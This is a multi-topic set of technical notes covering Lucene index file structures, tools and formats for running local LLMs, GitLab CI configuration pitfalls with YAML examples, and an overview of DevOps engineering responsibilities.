0: title (indexed=true, stored=true, hasTermVectors=false)
1: body (indexed=true, stored=false, hasNorms=true)

# .tmd: Term Metadata, stores extra metadata about terms (field-level summaries, term stats, checksums).
Field "title": 3 unique terms
Field "body": 6 unique terms
checksum: 0xA32F9C

# .si: Segment Info, describes the whole segment.
Segment name: _2
Lucene version: 9.0
Doc count: 3
Deleted docs: 0
Files: [_2.fdt, _2.fdx, _2.tim, _2.tip, ...]

# segments_4: Commit point, global file listing all segments that make up the index.
Segments:
  _2 (3 docs)
  _3 (7 docs)
  _4 (2 docs)
Generation: 4

# write.lock
hostname=localhost
processId=12345
  • Stored fields
# .fdt: Documents and their stored field 
Doc 0:
  title = "Hello World"
Doc 1:
  title = "Apache Lucene"
Doc 2:
  title = "Search Engines"

# .fdx: offsets for each Doc to help lucene to seek inside .fdt
Doc 0 offset: 0
Doc 1 offset: 34
Doc 2 offset: 71

# .fdm: metadata about how fields are stored and indexed
Field "title":
  type: text
  analyzer: standard
  norms: no
Field "body":
  type: text
  analyzer: standard
  norms: yes
  • Dictionary files
# .tim: Term dictionary for indexed fields
Term Dictionary:
  body: [
    "built" -> docFreq=1, totalTermFreq=1
    "data" -> docFreq=1, totalTermFreq=1
    "elasticsearch" -> docFreq=1, totalTermFreq=1
    "lucene" -> docFreq=2, totalTermFreq=2
    "segments" -> docFreq=1, totalTermFreq=1
    "stores" -> docFreq=1, totalTermFreq=1
  ]
  title: [
    "apache" -> docFreq=1
    "hello" -> docFreq=1
    "search" -> docFreq=1
  ]

# .tip: Pointers for terms in .tim file (for fast seek)
Pointers:
  "apache" → offset 0
  "lucene" → offset 128
  "search" → offset 192

# .doc: Postings (docIDs), lists which documents contain each term. 
Term: "lucene"
  → docIDs = [1, 2]
Term: "search"
  → docIDs = [2]
Term: "hello"
  → docIDs = [0]

# .pos: Positions, word positions within documents (for phrase queries, proximity).
Term: "lucene"
  Doc 1: positions [0]
  Doc 2: positions [4]
  • Doc values (Columnar values)
# .dvd columnar storage for sorting, faceting, analytics.
Field "popularity" (numeric doc values)
Doc 0: 10
Doc 1: 25
Doc 2: 5

# .dvm: contains metadata (like offsets, encodings).
Field count: 2
Field 0: popularity (numeric)
  offset: 0x00000010
  encoding: delta-compressed int
Field 1: category (sorted)
  offset: 0x00000100
  encoding: terms dictionary

  • Norms
# .nvd per-field normalization factors (used in scoring).
Field: body
Doc 0: norm=0.577
Doc 1: norm=0.707
Doc 2: norm=0.5

# .nvm: norms metadata.
Field count: 1
Field 0: body (norms)
  offset: 0x00000000
  encoding: byte
  numDocs: 3
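A sketch of how a phrase query uses the .doc and .pos data: first intersect the per-term doc lists (.doc), then require consecutive positions (.pos). The postings below are hand-copied from the example, plus a made-up entry for "stores":

```python
# Hypothetical postings mirroring the .doc/.pos examples:
# term -> {doc_id: [positions]}
postings = {
    "lucene":   {0: [0], 1: [0], 2: [4]},
    "stores":   {0: [1]},
    "segments": {1: [2]},
}

def phrase_query(terms):
    # .doc part: docs that contain every term.
    docs = set(postings[terms[0]])
    for t in terms[1:]:
        docs &= set(postings[t])
    # .pos part: terms must appear at consecutive positions.
    hits = []
    for d in sorted(docs):
        starts = postings[terms[0]][d]
        if any(all(p + i in postings[t][d] for i, t in enumerate(terms))
               for p in starts):
            hits.append(d)
    return hits

print(phrase_query(["lucene", "stores"]))    # [0]
print(phrase_query(["lucene", "segments"]))  # []
```

Doc 1 contains both "lucene" and "segments", but not adjacently, so the phrase query rejects it; that is exactly what .pos exists for.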

Field Settings

Each field in a Lucene document has the following separate boolean settings:

  • indexed: The field is searchable (terms go into the inverted index).
  • stored: The field’s original value is saved so it can be retrieved with the document.
  • docValues: The field’s value is stored in columnar form for sorting, faceting, etc.

Norms

Norms are small numeric factors Lucene computes per field, per document to help with relevance scoring.

They typically encode things like:

  • How long the field is (shorter fields often get a boost),
  • Whether it contains many terms,
  • Field-level boosts applied at indexing time.

These are used when computing the TF-IDF or BM25 score that determines how relevant a document is to a query.
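A toy BM25 calculation showing how the length norm feeds scoring (all numbers are made up; Lucene's actual implementation differs in how it encodes and caches these values):

```python
import math

# Toy BM25: dl (field length) vs avgdl (average field length) is the
# norm-like quantity; k1 and b are the usual default parameters.
def bm25(tf, df, N, dl, avgdl, k1=1.2, b=0.75):
    idf = math.log(1 + (N - df + 0.5) / (df + 0.5))
    return idf * (tf * (k1 + 1)) / (tf + k1 * (1 - b + b * dl / avgdl))

# "lucene" appears once (tf=1) in 2 of 3 docs (df=2, N=3).
score_short = bm25(tf=1, df=2, N=3, dl=4, avgdl=5)  # short body field
score_long = bm25(tf=1, df=2, N=3, dl=8, avgdl=5)   # long body field
print(score_short > score_long)  # True: shorter fields get a boost
```

Same term frequency, same idf: only the stored field length differs, and the shorter field wins.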

Doc values

Doc values are Lucene’s columnar data store — think of them like a per-field database column.

They’re designed for:

  • Sorting: e.g., sort search results by “price” or “date”
  • Faceting: e.g., count how many documents per “category”
  • Analytics: e.g., compute averages, histograms, or aggregations
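A minimal illustration of why a per-field column helps: sorting and faceting only touch that field's values, never the stored documents. The popularity values are taken from the .dvd example above; the category values are illustrative:

```python
from collections import Counter

# Columnar "doc values", indexed by docID (like .dvd), versus
# row-oriented stored fields.
popularity = [10, 25, 5]                # numeric doc values
category = ["db", "search", "search"]   # a sorted doc-values field

# Sorting: order docIDs by popularity without loading stored fields.
by_popularity = sorted(range(len(popularity)), key=popularity.__getitem__)
print(by_popularity)  # [2, 0, 1]

# Faceting: count docs per category value.
facets = Counter(category)
print(facets["search"])  # 2
```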

Index operations

Deletions

Deletes are soft: each segment keeps a live-docs bitset with one bit per doc, and a doc's bit is cleared (set to 0) to mark it for deletion.

On segment merge, segments with a higher proportion of deleted docs are prioritized.
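The bookkeeping can be sketched like this (segment names and the merge-ordering heuristic are illustrative, not Lucene's actual merge policy):

```python
# Soft deletes as a live-docs bitset: one bit per doc, cleared on delete.
segments = {
    "_2": [1, 1, 1],      # 3 docs, none deleted
    "_3": [1, 0, 0, 1],   # 4 docs, 2 deleted
}

def delete(seg, doc_id):
    segments[seg][doc_id] = 0   # doc is only marked; bytes stay on disk

def delete_ratio(seg):
    bits = segments[seg]
    return 1 - sum(bits) / len(bits)

delete("_2", 0)
# Toy merge ordering: prefer segments with the most deletions, since
# merging rewrites them without the dead docs and reclaims the space.
order = sorted(segments, key=delete_ratio, reverse=True)
print(order)  # ['_3', '_2']
```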

Updates

Updating a previously indexed document is a “cheap” delete followed by a re-insertion of the document. Updating a document is even more expensive than adding it in the first place. Thus, storing things like rapidly changing values in a Lucene index is probably not a good idea – there is no in-place update of values.

LLMs

Running LLMs

Timeline:

Inception

  • Sept 2022: Georgi Gerganov initiated the GGML (Georgi Gerganov Machine Learning) library as a C library implementing tensor algebra with strict memory management and multi-threading capabilities. This foundation would become crucial for efficient CPU-based inference.
  • Mar 2023: llama.cpp, built on top of GGML in pure C/C++ with no dependencies, enabled LLM execution on standard hardware without GPU requirements.
  • Jun 2023: Ollama, a Docker-like tool for AI models, simplified pulling, running, and managing local LLMs through familiar container-style commands. It became the easiest entry point for users wanting to experiment with local models.

Standardization

  • Aug 2023: GGUF (GGML Universal Format), the successor to the GGML format. GGUF provided an extensible, future-proof format storing comprehensive model metadata and supporting significantly improved tokenization code.
  • 2024: Multiple tools
    • vLLM emerged as a high-throughput inference server optimized for serving multiple users
    • GPT4All developed into a comprehensive desktop application with over 250,000 monthly active users
    • LM Studio became a popular cross-platform desktop client for model management

The flow

image

Building the model

  • The model is built and trained using PyTorch, TensorFlow, JAX or another framework
  • The framework outputs the model weights:
    • JAX/Flax: msgpack checkpoints (flax_model.msgpack) + config.json
    • TF/Keras: SavedModel directory (saved_model.pb + variables/) or HDF5 file (model.h5)
    • PyTorch: .pt or .pth saved with torch.save(model.state_dict(), "model.pt")
    • ONNX (Open Neural Network Exchange) a cross-framework intermediate format used to transfer models, it has a ONNX runtime which can run it
  • The models can be converted to Hugging Face model formats
    • pytorch_model.bin or model.safetensors → the weights (can be multiple shards if big).
    • config.json → architecture hyperparameters (hidden size, number of layers, etc.).
    • tokenizer.json, tokenizer.model, special_tokens_map.json, etc. → tokenizer files.
    • generation_config.json → default generation params.

model.safetensors is a safe, zero-copy serialization format for tensors. It is an alternative to PyTorch's pickle-based .bin (which can execute arbitrary code on load, hence unsafe), it supports other frameworks like TF and JAX, it is convertible to GGUF and other formats, and it can be run by vLLM natively.
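The layout is simple enough to sketch with the stdlib (a sketch based on the published format description, not the safetensors library): an 8-byte little-endian header size, a JSON header mapping tensor names to dtype/shape/data_offsets, then a raw byte buffer. Loading is just slicing, with no pickle and no code execution:

```python
import json
import struct

# Minimal safetensors-style writer/reader (assumed layout; for real
# files use the safetensors library).
def save(tensors):
    header, buf, off = {}, b"", 0
    for name, (dtype, shape, raw) in tensors.items():
        header[name] = {"dtype": dtype, "shape": shape,
                        "data_offsets": [off, off + len(raw)]}
        buf += raw
        off += len(raw)
    hjson = json.dumps(header).encode()
    return struct.pack("<Q", len(hjson)) + hjson + buf

def load(blob):
    n = struct.unpack("<Q", blob[:8])[0]      # header size
    header = json.loads(blob[8:8 + n])        # plain JSON metadata
    data = blob[8 + n:]
    return {name: data[m["data_offsets"][0]:m["data_offsets"][1]]
            for name, m in header.items()}    # raw bytes, zero parsing

blob = save({"w": ("F32", [2], struct.pack("<2f", 1.0, 2.0))})
print(struct.unpack("<2f", load(blob)["w"]))  # (1.0, 2.0)
```

Because offsets are known up front, a real loader can mmap the file and hand frameworks views into it instead of copying, which is where "zero-copy" comes from.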

Running the models (vLLM vs llama.cpp)

  • vLLM: Runs the model in HF format (inference). It can start an inference server with an OpenAI-compatible API
  • The model can be converted further (compiled) into TensorRT, NVIDIA's inference optimization runtime (for all DL models). It takes a model in any format (PyTorch, ONNX) and compiles it into a TensorRT engine .plan file highly optimized for Nvidia GPUs. (This is used if we are targeting Nvidia GPUs)

vLLM doesn’t use TensorRT by default (it uses its own kernel tricks), but you could use TensorRT separately.

  • On Apple Silicon the model can be converted with MLX to use the unified memory. MLX optimizes the model for inference on Apple Silicon (quantization, for example)
  • Convert the model from HF format to GGUF format (Quantization).
  • Run the GGUF on llama.cpp on CPU and low resource hardware.

Running the models as a user

  • Create a Modelfile to package the model a la Dockerfile.
FROM ./model-q4_k_m.gguf
PARAMETER temperature 0.7
TEMPLATE """{{ .Prompt }}"""
  • Build the model ollama create mymodel -f Modelfile and run it ollama run mymodel.

  • We can push/pull the model.

  • While ollama is developer friendly/focused, there are other tools geared towards end users like gpt4all and LM studio (GUI first, marketplace, builtin chat ui ...)

  • Common AI Model Formats

Running Local LLMs

Prerequisites

  • CUDA: Nvidia's parallel computing platform and programming interface for its GPUs
  • AMD ROCm is an open software stack including drivers, development tools, and APIs that enable GPU programming from low-level kernel to end-user applications.
  • Intel oneAPI: similar, but with a broader goal: standardizing computation across CPUs, GPUs, FPGAs, etc.

Inference Engines

image

Serving Frameworks

image These are serving frameworks in the sense that they do the entire thing including compression, deployment, serving, memory management, caching and so on, while the previous category only runs the model on the hardware (with some optimizations, but not a fully fledged framework).

  • LMDeploy: it is also a solution for running LLMs (inference).

Dev Oriented

  • Ollama: Uses docker like concepts to manage and run models
  • LocalAI:
    • It supports a lot of backends including llama.cpp, vllm, and hf transformers ...
    • It supports hardware acceleration on various models.
    • Arguably the most complete option, but it feels cumbersome.
    • It supports a declarative way to define models.
    • It is container first. Run with container images | LocalAI
  • mozilla-ai/llamafile: single-executable-file models (relies on llama.cpp)

Containers

  • Ramalama:
    • Supports multiple transports (ollama:// hf:// and oci:// and ModelScope://)
    • ramalama supports 3 runtimes: llama.cpp, vllm and mlx.
    • It starts a container image with everything needed to run the model including optimizations. On run ramalama detects the GPU information and decides which image to use.
  • Docker:
    • Similar, but Docker's AI models are not standard OCI images, which makes them not pullable from ramalama
    • Docker has introduced the ability to run MCP servers.

GUIs

tools

Expose report artifacts to next jobs

To expose report artifacts to subsequent jobs we use artifacts:paths

job:
  artifacts:
    paths:
      - report-name.json
    reports:

Terraform templates

There are 3 Terraform gitlab-ci.yml template files:

  1. Base: Contains hidden jobs to do different base tasks
  2. Base.Latest: Same as Base but with the latest terraform image
  3. Latest: Contains 4 jobs that use Base to do the underlying tasks

Include doesn't support anchor scripts

Gitlab CI doesn't play well with script overriding and includes

include: 
  - local: '.gitlab/ci/frontend.yml'

Client Tests:
  extends: .g-frontend-lint-test
  variables:
    CACHE_COMPRESSION_LEVEL: "fast"
  script:
    - *yarn-lint-script
    - *yarn-test-script
  stage: test
  needs: ["Client Install Deps"]

You can’t use YAML anchors across different YAML files sourced by include. You can only refer to anchors in the same file. To reuse configuration from different YAML files, use !reference tags or the extends keyword.

This makes sense since include is GitLab CI syntax and anchors are YAML syntax. So including a CI file does not imply the inclusion of all its YAML anchors.

I suggest you try to use the !reference or the extends keywords.
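For example, !reference can pull a script from an included file where an anchor cannot (file layout and job names below are illustrative):

```yaml
# .gitlab/ci/frontend.yml (hypothetical included file)
.yarn-lint:
  script:
    - yarn lint

# .gitlab-ci.yml
include:
  - local: '.gitlab/ci/frontend.yml'

Client Tests:
  stage: test
  script:
    - !reference [.yarn-lint, script]
    - yarn test
```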

Jobs: Grouping

Joint commands bug

Gitlab CI scripts have a weird bug.

If multiple commands are combined into one command string, only the last command's failure or success is reported. Source

The bug is discussed thoroughly (worth reading) in this Source.

There is another bug with single-line commands, mostly related to the same issue. Source

Non blocking manual jobs

Manual jobs block pipelines, i.e. pipelines won't have a success status until the manual jobs are run.

To allow pipelines to succeed even if the manual jobs are not run, we should specify allow_failure on them.

- if: '$CI_MERGE_REQUEST_IID'
  when: manual
  # If this is not specified the pipeline will be blocked until
  # the job is run manually
  allow_failure: true 

Triggers

  • We use trigger to define downstream pipeline trigger. When a trigger job starts a downstream pipeline is created.
  • trigger is used to create multi-project pipelines.
  • trigger can be used in conjunction with a small set of keywords.
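A minimal sketch of both trigger variants (project and file paths are illustrative):

```yaml
# Multi-project pipeline: starts a pipeline in another project
deploy-downstream:
  stage: deploy
  trigger:
    project: my-group/my-deployment-project
    branch: main

# Parent-child pipeline: starts a pipeline from a file in this project
child-pipeline:
  trigger:
    include: path/to/child-pipeline.yml
    strategy: depend   # mirror the downstream pipeline's status
```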

rule:changes in MR pipelines

In MR pipelines, rules:changes uses the git diff from the parent refs, and not from the last pushed commit.

test:
  ...
  rules:
    - if: $CI_PIPELINE_SOURCE == "merge_request_event"
      changes:
        - api/*
    ...

If we make changes to api/* in the first commit pushed to the MR, the test job will be created for all the next commits pushed to the MR even if we don't make changes to api/*.

More in this issue

rules:if does not support job local variables.

rules:if does not have access to variables declared in the same job.

The following job will run on master and preprod (even though its job-level regex only lists staging and demo).

variables:
  BRANCH_REGEX: '/staging|preprod|master|demo/'

workflow:
  rules:
    - if: '$FORCE_GITLAB_CI'
    - if: '$CI_MERGE_REQUEST_IID'
      # REGEX IN VARIABLE
    - if: '$CI_COMMIT_BRANCH =~ $BRANCH_REGEX'

rules-override-workflow-with-variables:
  variables:
    BRANCH_REGEX: '/staging|demo/'
  script:
    - echo "testing rules override workflow with variables"
  rules:
    - if: '$CI_COMMIT_BRANCH =~ $BRANCH_REGEX'

!reference and arrays

Up to 14.02, !reference is not useful with arrays outside of the script-type keywords, since it inserts nested arrays instead of flattening them.

script tags support nested arrays, so they work fine with !reference.

More on this issue

rules overrides workflow:rules

rules overrides workflow:rules and doesn't merge with them. workflow:rules are evaluated first to create the pipeline or not. Then rules are evaluated for each job.

workflow:
  rules:
    - if: '$FORCE_GITLAB_CI'
    - if: '$CI_MERGE_REQUEST_IID'
      # REGEX IN VARIABLE
    - if: '$CI_COMMIT_BRANCH =~ $BRANCH_REGEX'

when-with-rules-over-workflow:
  script:
    - echo "testing when with rules over workflow"
  rules:
    - if: '$CI_MERGE_REQUEST_IID'
      when: manual

The when-with-rules-over-workflow job will run on MRs only, and not on branches matching BRANCH_REGEX.

Rules' variables

We can set variables for rules:if.

The variable is set on the job if the conditions inside the rules are met. This is powerful since it allows for dynamic jobs (changing job behavior based on variables).

job:
  variables:
    DEPLOY_VARIABLE: "default-deploy"
  rules:
    - if: $CI_COMMIT_REF_NAME == $CI_DEFAULT_BRANCH
      variables:                              # Override DEPLOY_VARIABLE defined
        DEPLOY_VARIABLE: "deploy-production"  # at the job level.
    - if: $CI_COMMIT_REF_NAME =~ /feature/
      variables:
        IS_A_FEATURE: "true"                  # Define a new variable.
  script:
    - echo "Run script with $DEPLOY_VARIABLE as an argument"
    - echo "Run another script if $IS_A_FEATURE exists"

More in the docs

Service Intercommunication

services uses Docker links to connect the running job (build) container to the other containers defined in services. So the connection is one-to-many, from the build job to the services.

https://docs.gitlab.com/ee/ci/services/#debug-a-job-locally.

To enable intercommunication between services, we use the FF_NETWORK_PER_BUILD feature flag, which replaces the links with a user-defined bridge network.

More here!
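A sketch of a job where the services need to talk to each other (image names and aliases are illustrative):

```yaml
integration-test:
  variables:
    # One user-defined bridge network per build: job and all services
    # join it, so "db" and "cache" can reach each other by alias.
    FF_NETWORK_PER_BUILD: "true"
  services:
    - name: postgres:15
      alias: db
    - name: redis:7
      alias: cache
  script:
    - ./run-integration-tests.sh
```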

cache:key:files does not support variables

Gitlab does not yet support variables in cache:key:files.

https://docs.gitlab.com/ee/ci/variables/where_variables_can_be_used.html

This does not work: the cache created uses default as its key and does not take the file into consideration.

cache:
  key:
    files:
      - $CI_PROJECT_DIR/cache-key.txt
  paths:
    - $CI_PROJECT_DIR/hello.txt

Nested Variables

Gitlab started supporting nested variables in 13.10 (under feature-flag).

BUILD_ROOT_DIR: '${CI_BUILDS_DIR}'

Docs

DevOps Guide

DevOps engineering

"DevOps Engineer"" is a highly relative job title. Purists will tell you the term makes no sense because DevOps is a methodology, not a person. Yet, you will find thousands of job listings, each defining the role differently.

In many cases, these positions are simply rebranded Operations engineers or SysAdmin roles equipped with modern tooling. However, the actual scope of a DevOps Engineer varies widely and typically entails one or more of the following tasks:

  • Build: Core Infrastructure & Operations
    • Provisioning and maintaining resources, whether on-premise or in the cloud.
    • System Administration: Installing, patching, and maintaining OS-level components (Linux/Windows). This includes managing users, permissions, and filesystems.
    • Configuration Management: Automating the setup and maintenance of software configurations across servers.
    • Networking & Storage: Managing software-defined networking (VPCs, subnets) and storage volumes.
    • Operations Management: Handling routine maintenance, backups, and general system health.
    • Database Management: Basic provisioning, replication setup, and ensuring data persistence.
  • Design: Architecture & Design
    • System Design: Architecting solutions based on needs, e.g. choosing between loosely coupled (microservices) or tightly coupled (monoliths) structures.
    • High Availability & Scalability Strategy: Designing systems to withstand traffic spikes (auto-scaling) and regional failures (redundancy).
    • Cloud Architecture: Deciding which managed services (Serverless, Managed SQL, Object Storage) to use versus building from scratch.
  • Automate: Automation & Tooling
    • Automation: Replacing manual UI interactions with reproducible code.
    • Scripting & Middleware Development: Writing scripts to connect tools that don't natively talk to each other.
    • Infrastructure as Code (IaC): Defining the entire environment in configuration files rather than manual setup.
  • Release Engineering & Software Supply Chain
    • Software Supply Chain Management: Managing dependencies, auditing libraries for safety, and generating Software Bill of Materials (SBOM).
    • Deployment Strategy (e.g., Weekly Deployment): Executing releases using strategies like "Blue/Green" swaps or "Canary" releases to limit the blast radius of errors.
    • Version Control Management: Enforcing branching strategies (e.g., GitFlow vs. Trunk-Based) to keep code organized.
    • Artifact Management: Securing compiled binaries and container images in private registries.
  • Operate: Reliability & Incident Management (SRE)
    • Monitoring & Observability: Setting up dashboards to track metrics (CPU, latency), logs (errors), and traces (user journey).
    • Incident Response: Acting as the first responder during outages to triage and coordinate fixes.
    • Post-Incident Review (Post-Mortems): Writing Root Cause Analysis (RCA) reports after incidents to prevent recurrence.
    • Chaos Engineering: Stress-testing systems by intentionally breaking components to ensure recovery automation works.
  • Help: Developer Experience (DevEx)
    • Developer Environment Building: Creating pre-configured environments (e.g., DevContainers) so new hires can code on Day 1 without setup friction.
    • Internal Developer Platform (IDP): Building self-service portals where developers can provision their own resources without blocking Ops.
    • Documentation & Knowledge Base: Maintaining runbooks and wikis to prevent "brain drain" when engineers leave.
  • Protect: Security & Governance (DevSecOps)
    • Security & Compliance: Ensuring infrastructure meets legal standards (GDPR, HIPAA, PCI-DSS) and internal policies.
    • Identity & Access Management (IAM): Enforcing "Least Privilege" to ensure developers don't have unnecessary "God mode" access to production.
    • Vulnerability Scanning: Automating security checks for both infrastructure (OS patches) and application code (libraries).
  • Collaborate: Culture & People
    • Team Support: Acting as a technical unblocker for development teams.
    • Coaching: Providing DevOps coaching to teams to instill cultural best practices.
    • FinOps: Monitoring cloud costs and guiding teams toward architecting cost-effective solutions.

Fundamentals

Networking

Storage

Linux